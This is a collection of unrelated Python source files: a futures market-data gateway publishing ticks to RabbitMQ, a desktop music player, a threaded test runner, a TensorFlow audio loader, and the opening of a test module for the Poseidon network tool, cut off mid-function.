        self.best_port = None
        self.best_name = None
        self.api = None                  # TdxExHq_API session object
        self.last_tick_dt = None         # time of the last tick on this session
        self.last_sort_speed_dt = None   # time of the last server speed ranking
        self.instrument_count = 50000
        self.has_qry_instrument = False

        # rabbitmq settings taken from vt_setting.json
        self.conf = {}
        self.pub = None                  # rabbitmq publisher

    def write_error(self, content: str):
        """Log *content* at ERROR level."""
        self.write_log(msg=content, level=ERROR)

    def create_publisher(self, conf):
        """Create the RabbitMQ tick publisher once, from settings in *conf*."""
        if self.pub:
            return
        try:
            self.pub = publisher(host=conf.get('host', 'localhost'),
                                 port=conf.get('port', 5672),
                                 user=conf.get('user', 'admin'),
                                 password=conf.get('password', 'admin'),
                                 channel_number=conf.get('channel_number', 1),
                                 queue_name=conf.get('queue_name', ''),
                                 routing_key=conf.get('routing_key', 'default'),
                                 exchange=conf.get('exchange', 'x_fanout_idx_tick'))
        except Exception as ex:
            self.write_log(u'创建tick发布器异常:{}'.format(str(ex)))

    # ----------------------------------------------------------------------
    def registerEvent(self):
        """Subscribe to the engine's 1-second timer event."""
        self.event_engine.register(EVENT_TIMER, self.process_timer_event)

    def process_timer_event(self, event):
        """Once per minute: age out failed servers and run the health check."""
        dt = datetime.now()
        if dt.minute == self.last_minute:
            return
        # BUG FIX: last_minute was never assigned, so the guard above never
        # fired and this handler ran every second instead of once per minute
        # (draining fail_ip_dict cool-downs ~60x too fast).
        self.last_minute = dt.minute
        # count down the cool-down of servers that recently failed
        for k in list(self.fail_ip_dict.keys()):
            c = self.fail_ip_dict.get(k, 0)
            if c <= 0:
                self.fail_ip_dict.pop(k, None)
            else:
                c -= 1
                self.fail_ip_dict.update({k: c})
        self.check_status()

    # ----------------------------------------------------------------------
    def ping(self, ip, port=7709):
        """Measure the round-trip latency of one TDX server.

        Returns the latency in milliseconds, or a 10-second penalty value
        when the server is unreachable or reports an implausibly small
        instrument count.
        """
        apix = TdxExHq_API()
        __time1 = datetime.now()
        try:
            with apix.connect(ip, port):
                if apix.get_instrument_count() > 10000:
                    _timestamp = (datetime.now() - __time1).total_seconds() * 1000
                    self.write_log('服务器{}:{},耗时:{}ms'.format(ip, port, _timestamp))
                    return _timestamp
                else:
                    self.write_log(u'该服务器IP {}无响应.'.format(ip))
                    return timedelta(seconds=10).total_seconds() * 1000
        except Exception as ex:
            self.write_error(u'tdx ping服务器{},异常的响应{}'.format(ip, str(ex)))
            return timedelta(seconds=10).total_seconds() * 1000

    def sort_ip_speed(self):
        """Ping every configured server and sort ip_list fastest-first."""
        speed_result = []
        for x in self.ip_list:
            speed = self.ping(x['ip'], x['port'])
            x.update({'speed': speed})
            speed_result.append(copy.copy(x))
        self.ip_list = sorted(speed_result, key=lambda s: s['speed'])
        self.write_log(u'服务器访问速度排序:{}'.format(self.ip_list))

    # ----------------------------------------------------------------------
    def select_best_ip(self):
        """Pick the fastest server that is not in the failure cool-down list.

        Returns (ip, port, name), or (None, None, None) when nothing usable.
        """
        self.write_log(u'选择通达信行情服务器')
        # re-rank the servers at most once a minute
        if self.last_sort_speed_dt is None or (datetime.now() - self.last_sort_speed_dt).total_seconds() > 60:
            self.sort_ip_speed()
            self.last_sort_speed_dt = datetime.now()
        # servers that hit the 10s penalty are considered unreachable
        valid_ip_list = [x for x in self.ip_list if x.get('speed', 10000) < 10000]
        if len(valid_ip_list) == 0:
            self.write_error(u'未能找到合适速度得行情服务器')
            return None, None, None
        for server in valid_ip_list:
            ip = server.get('ip')
            port = server.get('port')
            name = server.get('name', '{}:{}'.format(ip, port))
            if '{}:{}'.format(ip, port) in self.fail_ip_dict:
                self.write_log(u'{}:{}属于上次异常IP地址,忽略'.format(ip, port))
                continue
            return ip, port, name
        return None, None, None

    def connect(self, rabbit_config: dict):
        """Connect to the best TDX server and start the publishing thread.

        rabbit_config: RabbitMQ settings, merged into self.conf.
        """
        if self.connection_status:
            # BUG FIX: this used `or`, which made the client check dead code
            # and reported "already connected" even when the session object
            # had lost its client.
            if self.api is not None and getattr(self.api, "client", None) is not None:
                self.write_log(u'当前已经连接,不需要重新连接')
                return
        self.write_log(u'开始通达信行情服务器')
        try:
            self.api = TdxExHq_API(heartbeat=True, auto_retry=True, raise_exception=True)
            # pick the fastest reachable server
            self.best_ip, self.best_port, self.best_name = self.select_best_ip()
            if self.best_ip is None or self.best_port is None:
                self.write_error(u'未能选择到服务器')
                # robustness fix: do not attempt api.connect(None, None)
                return
            self.write_log(u'api 选择 {}: {}:{}'.format(self.best_name, self.best_ip, self.best_port))
            self.api.connect(self.best_ip, self.best_port)
            # sanity check: a live server reports a plausible instrument count
            c = self.api.get_instrument_count()
            if c is None or c < 10:
                err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip, self.best_port)
                self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
                self.write_error(err_msg)
            else:
                self.write_log(u'创建tdx连接')
                self.last_tick_dt = datetime.now()
                self.connection_status = True
                self.instrument_count = c
        except Exception as ex:
            self.write_error(u'连接服务器tdx异常:{},{}'.format(str(ex), traceback.format_exc()))
            self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
            return
        # refresh symbol_exchange_dict / symbol_market_dict
        self.write_log(u'查询合约')
        self.qry_instrument()
        self.conf.update(rabbit_config)
        self.create_publisher(self.conf)
        self.req_thread = Thread(target=self.run)
        self.req_thread.start()

    def reconnect(self):
        """Rebuild the TDX session on a freshly selected server."""
        try:
            self.best_ip, self.best_port, self.best_name = self.select_best_ip()
            self.api = TdxExHq_API(heartbeat=True, auto_retry=True)
            self.api.connect(self.best_ip, self.best_port)
            # sanity check the new session
            c = self.api.get_instrument_count()
            if c is None or c < 10:
                err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip, self.best_port)
                self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
                self.write_error(err_msg)
            else:
                self.write_log(u'重新创建tdx连接')
            sleep(1)
        except Exception as ex:
            self.write_error(u'重新连接服务器异常:{},{}'.format(str(ex), traceback.format_exc()))
            self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
            return

    def close(self):
        """Stop the polling thread and shut down the RabbitMQ publisher."""
        self.write_log(u'退出tdx API')
        # clearing the flag makes run()'s loop exit before we join the thread
        self.connection_status = False
        if self.req_thread is not None:
            self.write_log(u'退出请求线程')
            self.req_thread.join()
        if self.pub:
            self.write_log(u'退出rabbitMQ 发布器')
            self.pub.exit()

    def check_status(self):
        """Reconnect when not connected or when no tick arrived for 60 seconds."""
        over_time = self.last_tick_dt is None or (datetime.now() - self.last_tick_dt).total_seconds() > 60
        if not self.connection_status or self.api is None or over_time:
            self.write_log(u'tdx还没有启动连接,就启动连接')
            self.close()
            self.api = None
            self.reconnect()

    def qry_instrument(self):
        """Fetch all contracts once and map index contracts (codes ending in
        "L9") to their vn.py exchange by TDX market id."""
        if not self.connection_status:
            self.write_error(u'tdx连接状态为断开,不能查询和更新合约信息')
            return
        if self.has_qry_instrument:
            self.write_error(u'已经查询过一次合约信息,不再查询')
            return
        # fetch all contract info in chunks of 500, highest offset first
        num = self.api.get_instrument_count()
        if not isinstance(num, int):
            return
        all_contacts = sum(
            [self.api.get_instrument_info((int(num / 500) - i) * 500, 500) for i in range(int(num / 500) + 1)], [])
        # entries look like {"category":..., "market": int, "code": str, "name": str, "desc": str}
        for tdx_contract in all_contacts:
            tdx_symbol = tdx_contract.get('code', None)
            # only index contracts (codes ending in "L9") are of interest
            if tdx_symbol is None or tdx_symbol[-2:] not in ['L9']:
                continue
            tdx_market_id = tdx_contract.get('market')
            self.symbol_market_dict[tdx_symbol] = tdx_market_id
            if tdx_market_id == 47:    # CFFEX (中金所)
                self.symbol_exchange_dict[tdx_symbol] = Exchange.CFFEX
            elif tdx_market_id == 28:  # CZCE (郑商所)
                self.symbol_exchange_dict[tdx_symbol] = Exchange.CZCE
            elif tdx_market_id == 29:  # DCE (大商所)
                self.symbol_exchange_dict[tdx_symbol] = Exchange.DCE
            elif tdx_market_id == 30:  # SHFE + INE (上期所+能源)
                self.symbol_exchange_dict[tdx_symbol] = Exchange.SHFE
            elif tdx_market_id == 60:  # dominant contracts (主力合约)
                self.write_log(u'主力合约:{}'.format(tdx_contract))
        self.has_qry_instrument = True

    def run(self):
        """Polling loop: fetch index quotes every req_interval seconds until
        connection_status is cleared (see close())."""
        try:
            last_dt = datetime.now()
            self.write_log(u'开始运行tdx,{}'.format(last_dt))
            while self.connection_status:
                try:
                    self.process_index_req()
                except BrokenPipeError as bex:
                    # broken pipe: mark the server bad, reconnect, and stop
                    # this loop (a new thread is started by connect())
                    self.write_error(u'BrokenPipeError{},重试重连tdx[{}]'.format(str(bex), 0))
                    self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
                    self.reconnect()
                    sleep(5)
                    break
                except Exception as ex:
                    self.write_error(u'tdx exception:{},{}'.format(str(ex), traceback.format_exc()))
                    self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
                    self.reconnect()
                sleep(self.req_interval)
                # heartbeat log once per minute
                dt = datetime.now()
                if last_dt.minute != dt.minute:
                    self.write_log('tdxcheck point. {},last_tick_dt:{}'.format(dt, self.last_tick_dt))
                    last_dt = dt
        except Exception as ex:
            self.write_error(u'tdx pool.run exception:{},{}'.format(str(ex), traceback.format_exc()))
        self.write_error(u'tdx 线程 {}退出'.format(datetime.now()))

    def process_index_req(self):
        """Fetch the TDX index quote board and publish each tick to RabbitMQ."""
        # market/category/start/count arguments — assumed to address the index
        # quote board (TODO confirm against pytdx get_instrument_quote_list docs)
        rt_list = self.api.get_instrument_quote_list(42, 3, 0, 100)
        if rt_list is None or len(rt_list) == 0:
            self.write_log(u'tdx:get_instrument_quote_list() rt_list为空')
            return
        # record the session's last successful quote time (used by check_status)
        self.last_tick_dt = datetime.now()
        for d in list(rt_list):
            tdx_symbol = d.get('code', None)
            # map the TDX index code (e.g. IFL9) to the vn.py style (IF99)
            if tdx_symbol.endswith('L9'):
                vn_symbol = tdx_symbol.replace('L9', '99').upper()
            else:
                vn_symbol = tdx_symbol.upper()
            tick_datetime = datetime.now()
            # synthesize milliseconds: if this second already produced a tick,
            # mark this one as the .5s tick of the same second
            last_tick = self.symbol_tick_dict.get(vn_symbol, None)
            if (last_tick is not None) and tick_datetime.replace(microsecond=0) == last_tick.datetime:
                tick_datetime = tick_datetime.replace(microsecond=500)
            else:
                tick_datetime = tick_datetime.replace(microsecond=0)
            tick = TickData(
                gateway_name='tdx',
                symbol=vn_symbol,
                datetime=tick_datetime,
                exchange=self.symbol_exchange_dict.get(tdx_symbol, Exchange.LOCAL)
            )
            tick.pre_close = float(d.get('ZuoJie', 0.0))
            tick.high_price = float(d.get('ZuiGao', 0.0))
            tick.open_price = float(d.get('JinKai', 0.0))
            tick.low_price = float(d.get('ZuiDi', 0.0))
            tick.last_price = float(d.get('MaiChu', 0.0))
            tick.volume = int(d.get('XianLiang', 0))
            tick.open_interest = d.get('ChiCangLiang')
            tick.time = tick.datetime.strftime('%H:%M:%S.%f')[0:12]
            tick.date = tick.datetime.strftime('%Y-%m-%d')
            tick.trading_day = get_trading_date(tick_datetime)
            # indexes have no real price limits; approximate with +/-10% of pre-close
            tick.limit_up = tick.pre_close * 1.1
            tick.limit_down = tick.pre_close * 0.9
            # single depth level only (CTP-style)
            tick.bid_price_1 = float(d.get('MaiRuJia', 0.0))
            tick.bid_volume_1 = int(d.get('MaiRuLiang', 0))
            tick.ask_price_1 = float(d.get('MaiChuJia', 0.0))
            tick.ask_volume_1 = int(d.get('MaiChuLiang', 0))
            underlying_symbol = vn_symbol.replace('99', '').upper()
            # drop ticks that fall outside trading hours
            if tick.exchange is Exchange.CFFEX:
                if tick.datetime.hour not in [9, 10, 11, 13, 14, 15]:
                    continue
                if tick.datetime.hour == 9 and tick.datetime.minute < 15:
                    continue
                # morning break 11:30~12:00
                if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
                    continue
                if tick.datetime.hour == 15 and tick.datetime.minute >= 15 and underlying_symbol in ['T', 'TF', 'TS']:
                    continue
                if tick.datetime.hour == 15 and underlying_symbol in ['IH', 'IF', 'IC']:
                    continue
            else:  # DCE / CZCE / SHFE / INE
                # hours with no session at all
                if tick.datetime.hour in [3, 4, 5, 6, 7, 8, 12, 15, 16, 17, 18, 19, 20]:
                    continue
                # morning break 10:15~10:30
                if tick.datetime.hour == 10 and 15 <= tick.datetime.minute < 30:
                    continue
                # morning break 11:30~12:00
                if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
                    continue
                # lunch break 13:00~13:30
                if tick.datetime.hour == 13 and tick.datetime.minute < 30:
                    continue
                # overnight break 2:30~3:00
                if tick.datetime.hour == 2 and tick.datetime.minute >= 30:
                    continue
                # products whose night session closes at 23:00
                if underlying_symbol in NIGHT_MARKET_23:
                    if tick.datetime.hour in [23, 0, 1, 2]:
                        continue
                # SHFE products whose night session closes at 1:00
                if underlying_symbol in NIGHT_MARKET_SQ2:
                    if tick.datetime.hour in [1, 2]:
                        continue
                # day-session-only products: drop anything outside 9~16
                if underlying_symbol in MARKET_DAY_ONLY and (tick.datetime.hour < 9 or tick.datetime.hour > 16):
                    continue
            self.symbol_tick_dict[tick.symbol] = tick
            if self.pub:
                d = copy.copy(tick.__dict__)
                if isinstance(tick.datetime, datetime):
                    d.update({'datetime': tick.datetime.strftime('%Y-%m-%d %H:%M:%S.%f')})
                # BUG FIX: Enum.value is a property, not a method; calling it
                # raised TypeError and aborted every publish.
                d.update({'exchange': tick.exchange.value})
                d = json.dumps(d)
                self.pub.pub(d)
|
main.py | import os
import eel
from pygame import mixer
from mutagen.mp3 import MP3
import threading
# --- interactive setup: ask for the music directory and collect its files ---
print('')
print(r'example:- C:\Users\Admin\Desktop\music')
# NOTE(review): `dir` shadows the builtin; kept because every handler below
# reads this global by that name.
dir = input('ENTER YOUR MUSIC DIRECTORY:- ')
print('')

eel.init("web")  # initialises eel

o = 0        # index of the current song in arr
status = 1   # 1 = playing, 0 = paused
vol = 1.0    # controls volume (1.0 = maximum volume)

# arr keeps track of all songs. os.listdir already returns a list, so the
# original element-by-element copy loop (with its `i` counter) was redundant.
arr = list(os.listdir(dir))
@eel.expose
def play():
    """Resume playback and mark the player as playing."""
    global status
    status = 1
    mixer.music.unpause()
    return 'play'
@eel.expose
def pause():
    """Pause playback and mark the player as paused."""
    global status
    status = 0
    mixer.music.pause()
    return 'pause'
@eel.expose
# increases volume (the original comment said "decreases" — the code adds 0.1)
def vol_up():
    """Raise the volume by 0.1 and apply it to the mixer."""
    global vol
    vol += 0.1
    mixer.music.set_volume(vol)
    return 'vol_up'
@eel.expose
# decreases volume (the original comment said "increases" — the code subtracts 0.1)
def vol_down():
    """Lower the volume by 0.1 and apply it to the mixer."""
    global vol
    vol -= 0.1
    mixer.music.set_volume(vol)
    return 'vol_down'
@eel.expose
def next():
    """Skip to the next song, wrapping to the first one after the last.

    NOTE(review): shadows the builtin `next`, but the name is part of the
    JS-facing eel API, so it must stay.
    """
    global arr
    global o
    global status
    # if music is not paused
    if status == 1:
        if o + 1 != len(arr):
            # loads and plays next song
            try:
                o += 1
                mixer.music.load(dir + "\\" + arr[o])
            except:
                return
            mixer.music.play()
            print(arr[o])
            return [arr[o], 'next']
        # if all songs have been played, it starts playing from the begining
        else:
            o = 0
            mixer.music.load(dir + "\\" + arr[o])
            mixer.music.play()
            print(arr[o])
            return [arr[o], 'next']
    # if music is paused
    elif status == 0:
        if o + 1 != len(arr):
            # loads next song, keeping playback paused
            try:
                o += 1
                mixer.music.load(dir + "\\" + arr[o])
            except:
                # NOTE(review): unlike the playing branch, a failed load here
                # skips one more song, retries the load, and returns without
                # starting playback — looks unintentional; confirm before
                # relying on it.
                o += 1
                mixer.music.load(dir + "\\" + arr[o])
                return
            mixer.music.play()
            mixer.music.pause()
            print(arr[o])
            return [arr[o], 'next']
        # if all songs have been played, it starts playing from the begining
        else:
            o = 0
            mixer.music.load(dir + "\\" + arr[o])
            mixer.music.play()
            print(arr[o])
            return [arr[o], 'next']
@eel.expose
def previous():
    """Step back one song, keeping the current play/pause state.

    Note: when the first song is current, ``o`` becomes -1 and Python's
    negative indexing wraps to the last song in the playlist.
    """
    global arr
    global o
    global status
    if status == 1:
        # playing: load the previous track and keep playing
        try:
            o -= 1
            mixer.music.load(dir + "\\" + arr[o])
        except:
            return
        mixer.music.play()
    elif status == 0:
        # paused: load the previous track, then pause it again immediately
        try:
            o -= 1
            mixer.music.load(dir + "\\" + arr[o])
        except:
            return
        mixer.music.play()
        mixer.music.pause()
    else:
        return
    print(arr[o])
    return [arr[o], 'previous']
@eel.expose
def main():
    """Drive the UI while the current song plays, then chain to the next.

    Busy-waits while the mixer is playing, pushing slider-position updates
    to the frontend; when the song ends it loads the next one and recurses.
    NOTE(review): the recursion grows the call stack by one frame per song
    played — acceptable for short sessions, but unbounded in principle.
    """
    global arr
    global o
    global status
    # updates the HTML header with the current playing song
    eel.name_update(arr[o])
    print(arr[o])
    # gets song length
    def length():
        # total duration of the current file in whole seconds
        length = MP3(dir + "\\" + arr[o]).info.length
        return int(length)
    # updates song slider bar
    while mixer.music.get_busy() != 0:
        # get_pos() is in milliseconds; scale to a 0-100 slider percentage
        eel.time(int((((mixer.music.get_pos()) / 1000) / length()) * 100))
        # inner busy-wait keeps the slider updated while paused
        while status == 0:
            o  # no-op expression statement (has no effect); kept as-is
            eel.time(int((((mixer.music.get_pos()) / 1000) / length()) * 100))
    # plays next song if song has finished
    if mixer.music.get_busy() == 0:
        o += 1
        if o != len(arr):
            mixer.music.load(dir + "\\" + arr[o])
            mixer.music.play()
            main()
        else:
            # playlist exhausted: wrap around to the first song
            o = 0
            mixer.music.load(dir + "\\" + arr[o])
            mixer.music.play()
            main()
# Starts the index.html file
def start():
    # blocks inside eel's server loop, so it is run from a worker thread below
    eel.start("index.html")
# begin playback of the first song before the UI comes up
mixer.init()
mixer.music.load(dir + '\\' + arr[o])
mixer.music.play()
if __name__ == '__main__':
    # eel.start() blocks; run it in a thread while main() drives playback
    threading.Thread(target = start).start()
main() |
engine.py | import logging
import threading
import time
from cct.common.enums import case_running_status
logger = logging.getLogger(__file__)
class Engine(object):
    """Runs every case of a test set concurrently, one thread per case."""

    def __init__(self, *keys, **kwargs):
        # the test set that owns the cases to execute (kwarg: test_set)
        self.__testset = kwargs.get('test_set')
        # threads spawned by start(); all are joined before start() returns
        self.__case_thread_list = []

    def start(self):
        """Launch one daemon thread per case and wait for all to finish."""
        # execute the cases
        for _case_id, case in self.__testset.case_dict.items():
            t = threading.Thread(target=self.run_single_case, name=case.case_id, kwargs={'case': case})
            # daemon so a hung case cannot keep the interpreter alive;
            # Thread.setDaemon() is deprecated in favour of the attribute
            t.daemon = True
            logger.info('test case ={name} will start'.format(name=case.name))
            t.start()
            self.__case_thread_list.append(t)
        for t in self.__case_thread_list:
            t.join()

    def run_single_case(self, case):
        """Drive one case through its lifecycle and record PASS/FAILED."""
        try:
            case.status = case_running_status.RUNNING
            self.pause_4_depend_other_case(case)
            case.pre_test()
            self.pause_4_depend_op_status(case)
            case.process()
            case.post_test()
            self.__testset.set_case_status(case, case_running_status.PASS)
        except Exception:
            # a failure anywhere in the lifecycle marks the case FAILED;
            # log the traceback instead of swallowing it silently (the
            # original bare `except:` hid the cause entirely)
            logger.exception('case={name} failed'.format(name=case.name))
            self.__testset.set_case_status(case, case_running_status.FAILED)

    def pause_4_depend_other_case(self, case):
        """Block until the cases this case depends on have finished."""
        if case.dependence:
            logger.info('case={name} will pause to wait for other case running status'.format(name=case.name))
            case.pause()

    def pause_4_depend_op_status(self, case):
        """Block until dependent operation statuses are satisfied."""
        if case.dep_op_dict:
            logger.info('case={name} will pause to wait for other case op status'.format(name=case.name))
            case.pause()
        else:
            logger.info ('case={name} will not pause={rst}'.format(name=case.name, rst=case.dep_op_dict is None))
def do1():
    """Demo helper: emit a fixed log line."""
    logger.info("i am doing 1")
|
audio_reader.py | import fnmatch
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
# Corpus file names look like p<speaker_id>_<recording_id>.wav
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
    """Return (min_id, max_id) of the speaker ids embedded in *files*.

    Assumes every filename matches FILE_PATTERN; a non-matching name
    raises IndexError, exactly as the original lookup did.
    Returns (None, None) for an empty input.
    """
    pattern = re.compile(FILE_PATTERN)
    min_id = None
    max_id = None
    for filename in files:
        speaker_id = int(pattern.findall(filename)[0][0])
        if min_id is None or speaker_id < min_id:
            min_id = speaker_id
        if max_id is None or speaker_id > max_id:
            max_id = speaker_id
    return min_id, max_id
def randomize_files(files):
    """Shuffle *files* in place, then lazily yield each entry."""
    random.shuffle(files)
    yield from files
def find_files(directory, pattern='*.wav'):
    '''Recursively finds all files matching the pattern.'''
    matched = []
    for root, _dirnames, filenames in os.walk(directory):
        matched.extend(os.path.join(root, name)
                       for name in fnmatch.filter(filenames, pattern))
    return matched
def load_generic_audio(directory, sample_rate):
    '''Generator yielding (audio, filename, category_id) from *directory*.

    Audio is decoded mono at *sample_rate* and reshaped to (n_samples, 1).
    NOTE: category_id is currently always None, even for filenames that
    match FILE_PATTERN; id extraction is simply not implemented here.
    '''
    files = find_files(directory)
    id_reg_exp = re.compile(FILE_PATTERN)
    print("files length: {}".format(len(files)))
    randomized_files = randomize_files(files)
    for filename in randomized_files:
        ids = id_reg_exp.findall(filename)
        # BUGFIX: re.findall returns a (possibly empty) list, never None,
        # so the original `if ids is None` branch could never fire.
        if not ids:
            # The file name does not match the pattern containing ids, so
            # there is no id.
            category_id = None
        else:
            # The file name matches the pattern, but id extraction is not
            # implemented, so the id is discarded.
            category_id = None
        audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
        audio = audio.reshape(-1, 1)
        yield audio, filename, category_id
def trim_silence(audio, threshold):
    '''Removes silence at the beginning and end of a sample.'''
    # frame-wise RMS energy (librosa < 0.7 API; renamed to `rms` in 0.7+)
    energy = librosa.feature.rmse(audio)
    # tuple of (row, column) index arrays of frames above the threshold
    frames = np.nonzero(energy > threshold)
    # [1] selects the column (frame) axis converted to sample positions
    # — TODO confirm against the librosa version actually in use
    indices = librosa.core.frames_to_samples(frames)[1]
    # Note: indices can be an empty array, if the whole audio was silence.
    return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
def not_all_have_id(files):
    ''' Return true iff any of the filenames does not conform to the pattern
    we require for determining the category id.'''
    id_reg_exp = re.compile(FILE_PATTERN)
    for file in files:
        ids = id_reg_exp.findall(file)
        # BUGFIX: re.findall returns an empty list (never None) when there
        # is no match, so the original `if ids is None` check made this
        # function unconditionally return False.
        if not ids:
            return True
    return False
class AudioReader(object):
    '''Generic background audio reader that preprocesses audio files
    and enqueues them into a TensorFlow queue.'''
    def __init__(self,
                 audio_dir,
                 coord,
                 sample_rate,
                 gc_enabled,
                 sample_size,
                 silence_threshold=None,
                 queue_size=32):
        # Directory searched recursively for .wav files.
        self.audio_dir = audio_dir
        # Target sample rate used when decoding audio.
        self.sample_rate = sample_rate
        # Coordinator used to signal reader threads to stop.
        self.coord = coord
        # Length (in samples) of the pieces fed into the queue.
        self.sample_size = sample_size
        # RMS threshold for trimming leading/trailing silence; None disables.
        self.silence_threshold = silence_threshold
        # Whether global conditioning (per-speaker ids) is enabled.
        self.gc_enabled = gc_enabled
        # Reader threads created by start_threads().
        self.threads = []
        self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
        self.queue = tf.PaddingFIFOQueue(queue_size,
                                         ['float32'],
                                         shapes=[(None, 1)])
        self.enqueue = self.queue.enqueue([self.sample_placeholder])
        if self.gc_enabled:
            # Parallel queue carrying the category id for each audio piece.
            self.id_placeholder = tf.placeholder(dtype=tf.int32, shape=())
            self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
                                                shapes=[()])
            self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
        # TODO Find a better way to check this.
        # Checking inside the AudioReader's thread makes it hard to terminate
        # the execution of the script, so we do it in the constructor for now.
        files = find_files(audio_dir)
        if not files:
            raise ValueError("No audio files found in '{}'.".format(audio_dir))
        if self.gc_enabled and not_all_have_id(files):
            raise ValueError("Global conditioning is enabled, but file names "
                             "do not conform to pattern having id.")
        # Determine the number of mutually-exclusive categories we will
        # accomodate in our embedding table.
        if self.gc_enabled:
            _, self.gc_category_cardinality = get_category_cardinality(files)
            # Add one to the largest index to get the number of categories,
            # since tf.nn.embedding_lookup expects zero-indexing. This
            # means one or more at the bottom correspond to unused entries
            # in the embedding lookup table. But that's a small waste of memory
            # to keep the code simpler, and preserves correspondance between
            # the id one specifies when generating, and the ids in the
            # file names.
            self.gc_category_cardinality += 1
            print("Detected --gc_cardinality={}".format(
                self.gc_category_cardinality))
        else:
            self.gc_category_cardinality = None
    def dequeue(self, num_elements):
        # Op that dequeues a batch of `num_elements` audio pieces.
        output = self.queue.dequeue_many(num_elements)
        return output
    def dequeue_gc(self, num_elements):
        # Op that dequeues the matching batch of category ids.
        return self.gc_queue.dequeue_many(num_elements)
    def thread_main(self, sess):
        # Body of each reader thread: decode files forever and feed the
        # queue until the coordinator requests a stop.
        buffer_ = np.array([])
        stop = False
        # Go through the dataset multiple times
        while not stop:
            iterator = load_generic_audio(self.audio_dir, self.sample_rate)
            for audio, filename, category_id in iterator:
                if self.coord.should_stop():
                    stop = True
                    break
                if self.silence_threshold is not None:
                    # Remove silence
                    audio = trim_silence(audio[:, 0], self.silence_threshold)
                    audio = audio.reshape(-1, 1)
                    if audio.size == 0:
                        print("Warning: {} was ignored as it contains only "
                              "silence. Consider decreasing trim_silence "
                              "threshold, or adjust volume of the audio."
                              .format(filename))
                # Cut samples into fixed size pieces
                # NOTE(review): the final piece of each buffer may be
                # shorter than sample_size; the padding queue absorbs it.
                buffer_ = np.append(buffer_, audio)
                while len(buffer_) > 0:
                    piece = np.reshape(buffer_[:self.sample_size], [-1, 1])
                    sess.run(self.enqueue,
                             feed_dict={self.sample_placeholder: piece})
                    buffer_ = buffer_[self.sample_size:]
                    if self.gc_enabled:
                        sess.run(self.gc_enqueue,
                                 feed_dict={self.id_placeholder:
                                            category_id})
    def start_threads(self, sess, n_threads=1):
        # Spawn `n_threads` daemon reader threads and return them.
        for _ in range(n_threads):
            thread = threading.Thread(target=self.thread_main, args=(sess,))
            thread.daemon = True  # Thread will close when parent quits.
            thread.start()
            self.threads.append(thread)
        return self.threads
|
test_main.py | # -*- coding: utf-8 -*-
"""
Test module for poseidon.py
Created on 28 June 2016
@author: Charlie Lewis, dgrossman, MShel
"""
import json
import logging
import os
import time
import redis
from prometheus_client import Gauge
from poseidon.constants import NO_DATA
from poseidon.helpers.config import Config
from poseidon.helpers.endpoint import endpoint_factory
from poseidon.main import CTRL_C
from poseidon.main import Monitor
from poseidon.main import rabbit_callback
from poseidon.main import schedule_job_kickurl
from poseidon.main import schedule_job_reinvestigation
from poseidon.main import schedule_thread_worker
from poseidon.main import SDNConnect
logger = logging.getLogger('test')
def test_mirror_endpoint():
    """Smoke test: mirroring a registered endpoint must not raise."""
    sdn = SDNConnect(Config().get_config())
    ep = endpoint_factory('foo')
    ep.endpoint_data = {
        'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
    sdn.endpoints[ep.name] = ep
    sdn.mirror_endpoint(ep)
def test_unmirror_endpoint():
    """Smoke test: unmirroring a registered endpoint must not raise."""
    sdn = SDNConnect(Config().get_config())
    ep = endpoint_factory('foo')
    ep.endpoint_data = {
        'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
    sdn.endpoints[ep.name] = ep
    sdn.unmirror_endpoint(ep)
def test_clear_filters():
    """Smoke test clear_filters() for the default and 'bcf' controller types."""
    for controller_type in (None, 'bcf'):
        controller = Config().get_config()
        if controller_type is not None:
            controller['TYPE'] = controller_type
        sdn = SDNConnect(controller)
        ep = endpoint_factory('foo')
        ep.endpoint_data = {
            'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
        sdn.endpoints[ep.name] = ep
        sdn.clear_filters()
def test_check_endpoints():
    """check_endpoints() must tolerate a missing SDN controller connection."""
    sdn = SDNConnect(Config().get_config())
    sdn.sdnc = None
    sdn.check_endpoints()
def test_endpoint_by_name():
    """endpoint_by_name returns None for unknown names, the endpoint otherwise."""
    controller = Config().get_config()
    s = SDNConnect(controller)
    endpoint = s.endpoint_by_name('foo')
    assert endpoint is None  # PEP 8 / E711: compare to None with `is`
    endpoint = endpoint_factory('foo')
    endpoint.endpoint_data = {
        'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
    s.endpoints[endpoint.name] = endpoint
    endpoint2 = s.endpoint_by_name('foo')
    assert endpoint == endpoint2
def test_endpoint_by_hash():
    """endpoint_by_hash returns None for unknown hashes, the endpoint otherwise."""
    controller = Config().get_config()
    s = SDNConnect(controller)
    endpoint = s.endpoint_by_hash('foo')
    assert endpoint is None  # PEP 8 / E711: compare to None with `is`
    endpoint = endpoint_factory('foo')
    endpoint.endpoint_data = {
        'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
    s.endpoints[endpoint.name] = endpoint
    endpoint2 = s.endpoint_by_hash('foo')
    assert endpoint == endpoint2
def test_endpoints_by_ip():
    """endpoints_by_ip returns [] when unknown and the matching endpoints otherwise."""
    sdn = SDNConnect(Config().get_config())
    assert sdn.endpoints_by_ip('10.0.0.1') == []
    ep = endpoint_factory('foo')
    ep.endpoint_data = {
